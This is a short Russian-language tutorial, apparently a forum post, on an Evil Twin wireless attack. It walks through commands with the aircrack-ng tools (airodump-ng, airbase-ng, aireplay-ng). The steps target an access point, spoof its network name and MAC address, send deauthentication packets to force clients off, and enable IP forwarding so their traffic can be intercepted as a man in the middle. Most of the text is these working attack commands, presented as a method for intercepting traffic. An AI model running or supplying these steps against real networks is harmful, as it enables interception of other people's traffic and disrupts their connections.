Целью атаки Evil Twin является дублирование сети с одинаковым именем сети (ESSID и mac BSSID) в надежде, что клиенты подключатся к точке доступа. Затем злоумышленник может выполнить атаку «человек посередине» и перехватить трафик.
Указание целевой точки доступа с помощью airodump-ng
Код:
airodump-ng –bssid <Access Point MAC> wlan0mon
Подмена ESSID (имя сети) и BSSID (Mac-адрес) с помощью airbase-ng
Код:
airbase-ng -a <Access Point MAC> –essid “<Network Name>” -c 10 wlan0mon
Отмена аутентификации доступа
Код:
aireplay-ng -0 5 -a <Access Point MAC> wlan0mon
Включение IP-пересылки
Если мы включим IP-пересылку, мы сможем перехватить трафик.
Код:
nano /proc/sys/net/ipv4/ip_forward
Ссылка скрыта от гостей